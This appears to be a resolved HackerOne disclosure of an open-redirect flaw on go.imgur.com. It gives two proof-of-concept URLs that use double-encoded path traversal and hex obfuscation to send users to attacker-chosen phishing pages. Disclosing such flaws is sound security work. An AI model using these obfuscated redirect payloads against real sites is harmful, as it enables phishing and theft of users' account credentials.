Go.imgur.com can be used to phish for account information
Low
Vulnerability Details
Right now the **go.imgur.com** domain is pointing to `godoc.org/go.imgur.com` but there is nothing at this resource. It is possible with encoded double dots to redirect **go.imgur.com** URLs to pages that phish for imgur account information.
Proof of Concept
===
PoC 1:
###
`http://go.imgur.com/account-verification/%252e%252e%2f%252e%252e%2f%67%69%74%68%75%62%2e%63%6f%6d%2f%6b%69%79%65%6c%6c%2f%70%71`
In this example the URL is customized to appear more legitimate.
Resulting page: F322182
PoC 2:
###
`http://go.imgur.com/account-verification/%252e%252e%2f%252e%252e%2f%67%69%74%68%75%62%2e%63%6f%6d%2f%6b%69%79%65%6c%6c%2f%70%71%23%68%64%72%2d%57%41%52%4e%49%4e%47%5f%5f%5f%49%4d%50%4f%52%54%41%4e%54%5f%41%43%43%4f%55%4e%54%5f%49%4e%46%4f%52%4d%41%54%49%4f%4e`
In this longer example, code was added that adds emphasis to the phishing message.
Resulting page: F322181
## Impact
An attacker could mass email users for their account information or could use this vulnerability as part of another type of social engineering campaign against Imgur partners and customers.
Actions
View on HackerOneReport Stats
- Report ID: 384101
- State: Closed
- Substate: resolved
- Upvotes: 18